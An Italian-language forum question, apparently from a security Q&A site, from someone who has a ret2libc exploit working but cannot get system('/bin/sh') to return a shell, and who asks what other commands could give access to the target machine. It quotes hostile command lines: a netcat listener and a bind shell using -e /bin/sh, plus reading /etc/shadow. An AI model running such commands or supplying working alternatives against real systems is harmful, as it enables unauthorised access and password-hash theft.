Ho sfruttato con successo un programma usando ret2libc ma sto incontrando un problema.
Ogni volta che nutro system()
con /bin/sh
non ho nulla in cambio, il programma esce silenziosamente.
Tuttavia, se nutro echo val > /t
e leggo /t
, ottengo val
.
Quindi sono in grado di eseguire comandi parziali e voglio sapere quali comandi possono essere usati invece di generare una shell?
Ho pensato a:
nc -l -p 99 #but I get illegal arg -p
cat /etc/shadow #but I get sh: 1: tc/shadow: not found
Vorrei sapere quali altre possibilità posso eseguire che mi consentiranno di accedere al server / computer vulnerabile tenendo presente che la shell inversa ( nc -l -p -e /bin/sh
) non ha funzionato a causa della limitazione delle stringhe di qualche tipo.